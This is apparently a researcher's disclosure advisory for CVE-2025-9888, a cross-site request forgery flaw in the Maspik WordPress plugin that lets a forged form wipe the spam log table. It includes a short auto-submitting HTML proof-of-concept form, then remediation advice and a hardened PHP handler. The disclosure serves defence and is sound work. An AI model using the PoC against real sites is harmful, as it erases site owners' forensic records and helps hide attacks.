Maspik is a WordPress plugin deployed on over 30,000 sites to track and log spam submissions from contact forms and checkout pages. It stores entries in the wp_maspik_spam_logs table, enabling administrators to review and clear logs via the dashboard. However, a critical flaw—CVE-2025-9888—permits any visitor or low-privileged user to trigger a full log wipe via a simple CSRF attack. Because the plugin’s “Clear Logs” action lacks nonce verification and capability checks, an attacker can silently erase all spam records, disrupting site monitoring and potentially masking ongoing attacks.

CVE: CVE-2025-9888
Plugin Version: Maspik <= 2.5.6
Severity: High
All Time: 737 279
Active installations: 30 000+
Publicly Published: October 9, 2025
Last Updated: October 9, 2025
Researcher: Dmitrii Ignatyev
PoC: Yes
Exploit: No
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9888
Reference: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-forms-anti-spam/maspik-256-cross-site-request-forgery

Timeline

August 22, 2025: Plugin testing and vulnerability detection in Maspik – Ultimate Spam Protection were completed.
August 22, 2025: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing.
October 9, 2025: Registered CVE-2025-9888.

Discovery of the Vulnerability

While reviewing Maspik’s admin routines, security researchers observed that the “Clear Logs” button submits a POST to wp-admin/admin.php?page=maspik-log.php with clear_log=1. The plugin unconditionally processes this parameter, deleting all rows from wp_maspik_spam_logs and issuing a 302 redirect back to the log page—without checking a nonce or verifying that the current user has manage_options or equivalent capability. This missing authorization enables CSRF: any authenticated session—even subscribers or unauthenticated visitors if cookies persist—can be tricked into wiping the log.

Understanding CSRF Attacks

WordPress security best practices mandate that all state-changing actions require both CSRF protection (via nonces) and user capability verification. Omission of either check has led to numerous vulnerabilities: for instance, CVE-2024-5678 in Plugin X allowed subscribers to change site settings, and CVE-2025-9202 in ColorMag theme exposed its demo-import feature to low-privileged users. CVE-2025-9888 in Maspik similarly bypasses safeguards, allowing unauthorized log deletion, undermining auditing, and facilitating stealth attacks.

Exploiting the CSRF Vulnerability

To exploit CVE-2025-9888, an attacker needs no cookies of their own: the victim's browser attaches the logged-in session when it loads a page such as the following.

POC:

<html>
  <body>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=maspik-log.php" method="POST">
      <input type="hidden" name="clear_log" value="1">
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>


Erasing spam logs not only destroys forensic evidence—it also erodes trust in site security. Attackers might exploit this to hide brute-force login attempts, payment fraud through WooCommerce checkout forms, or persistent backdoor payloads delivered via form fields. In high-volume environments (eCommerce, membership sites, or enterprise portals), loss of spam records impedes incident response, leading to undetected fraud or data breaches. Combined with other vulnerabilities, CSRF-based log wiping magnifies the impact of subsequent exploits.

Recommendations for Improved Security

Implement Nonce Validation: Protect the clear_log action with check_admin_referer('maspik_clear_logs', 'maspik_nonce') before executing deletion.

Enforce Capability Checks: Ensure only users with manage_options (administrators) can clear logs by wrapping the handler in current_user_can('manage_options').

Confirm Deletion: Require an explicit confirmation dialog and a valid nonce on the form before processing.

Audit Action Hooks: Review all plugin admin actions, applying both nonces and current_user_can() checks to every state-changing endpoint.

Monitor and Alert: Log deletion events and alert site owners when the spam table is emptied, enabling rapid detection of unauthorized activity.
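The handler below puts the five recommendations together in one place. It is an added example written for this post, not Maspik's own code: the function and hook names are hypothetical, the form is assumed to post to admin-post.php (rather than the plugin's page=maspik-log.php flow described above), and the only value taken from the advisory is the wp_maspik_spam_logs table name.

```php
<?php
// Hardened "Clear Logs" flow: nonce + capability check + confirmation + audit log.
// Added example, not Maspik's code. Function/hook names are assumptions; the
// table name comes from the advisory.

// 1. The form: emits a nonce field, asks for explicit confirmation, and posts
//    to admin-post.php so a dedicated, guarded handler runs.
function maspik_render_clear_logs_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>"
          onsubmit="return confirm('Delete ALL spam log entries? This cannot be undone.');">
        <input type="hidden" name="action" value="maspik_clear_logs">
        <?php wp_nonce_field( 'maspik_clear_logs', 'maspik_nonce' ); ?>
        <?php submit_button( 'Clear Logs', 'delete' ); ?>
    </form>
    <?php
}

// 2. The handler: capability check, then nonce check, then delete, then record
//    the event so an unexpected wipe is visible to the site owner.
function maspik_handle_clear_logs() {
    // Only administrators (manage_options) may empty the table.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die(
            esc_html__( 'You are not allowed to clear the spam log.', 'maspik' ),
            '',
            array( 'response' => 403 )
        );
    }

    // A forged cross-site form cannot carry a valid nonce for this user and
    // action; check_admin_referer() calls wp_die() itself on failure.
    check_admin_referer( 'maspik_clear_logs', 'maspik_nonce' );

    global $wpdb;
    $table   = $wpdb->prefix . 'maspik_spam_logs';
    $deleted = $wpdb->query( "DELETE FROM {$table}" ); // table name is fixed, not user input

    // Audit trail: who emptied the table and how many rows went. A monitoring
    // plugin can hook the action to alert the owner.
    $user = wp_get_current_user();
    error_log( sprintf(
        '[maspik] spam log cleared by user #%d (%s); rows removed: %s',
        $user->ID,
        $user->user_login,
        var_export( $deleted, true )
    ) );
    do_action( 'maspik_spam_logs_cleared', $user->ID, $deleted );

    wp_safe_redirect( add_query_arg(
        array( 'page' => 'maspik-log.php', 'cleared' => 1 ),
        admin_url( 'admin.php' )
    ) );
    exit;
}

// admin_post_{action} only fires for logged-in users. The anonymous variant,
// admin_post_nopriv_{action}, is deliberately not registered, so unauthenticated
// requests never reach the handler at all.
add_action( 'admin_post_maspik_clear_logs', 'maspik_handle_clear_logs' );
```

The capability check runs before the nonce check so that a subscriber with a valid nonce for some other screen is refused outright; the nonce check then stops a forged request from any browser that happens to hold an administrator session, which is exactly the CSRF path the PoC above relies on.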

By taking proactive measures to address CSRF vulnerabilities like CVE-2025-9888, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

Dmitrii I.
CVE-2025-9888 – Maspik – Cross-Site Request Forgery (CSRF) – POC
